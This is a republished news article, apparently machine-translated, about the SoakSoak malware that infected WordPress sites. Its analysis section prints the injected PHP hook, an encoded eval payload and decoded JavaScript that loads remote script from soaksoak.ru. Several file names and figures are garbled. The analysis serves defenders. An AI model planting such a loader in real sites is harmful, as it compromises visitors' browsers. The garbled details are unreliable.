0.1 million WordPress website collapse: the malicious software SoakSoak has arrived

Source: Internet
Author: User

0.1 million WordPress website collapse: the malicious software SoakSoak has arrived

WoRdPress is a blog platform developed in PHP. You can set up your own blog and use WordPress as a content management system (CMS. WordPress security vulnerabilities have occurred frequently in recent months, includingFree theme hidden webshells that affect well-known CMS systems such as WordPress,WordPress versions earlier than 4.0 have the XSS Vulnerability.Now, a widely spread malware has infected more than 100,000 WordPress websites, and the number is still increasing.

Google blacklists over 11,000 domain names

The message was first sent to the WordPress community on Sunday morning because Google blacklisted more than 11,000 domain names. These websites were all attacked by the latest malware. The software came from SoakSoak.ru, so it is named SoakSoak malware. As more than 0.7 billion of the websites on the Internet use WordPress, Such malware has a huge impact.

Once infected, the website will experience abnormal behavior, including redirecting to SoakSoak.ru. Users accessing the website may also automatically download malicious programs. Google has blacklisted 11,000 websites that may be infected with viruses.

Malware Analysis


Malware SoakSoak modifies wp-prodes/template-loader.php files


<?phpfunction FuncQueueObject(){  wp_enqueue_script("swfobject");}add_action("wp_enqueue_scripts",'FuncQueueObject');

In this wayWp-nodes des/js/swobject. jsThe file is loaded on every page.Swobject. jsThe file contains the encrypted malicious js Code.

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Decrypted code:

eval(decodeURIComponent('(function(){    //var ua = navigator.userAgent.toLowerCase();    //if (ua.indexOf('chrome') != -1) return;    var head=document.getElementsByTagName('head')[0];    var script=document.createElement('script');    script.type='text/javascript';    script.src='http://soaksoak.ru/xteas/code';    script.id='xxyyzz_petushok';    head.appendChild(script);}());'));


Once the malicious code is decrypted, the JavaScript code in the SoakSoak.ru domain name will be loaded:Hxxp: // soaksoak.ru/xteas/code

Detection and Prevention

It is unclear how the virus infected the website. If you are using WordPress and you are worried that your website is infected, Sucuri provides a free website scan to check whether your website is infected with viruses.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.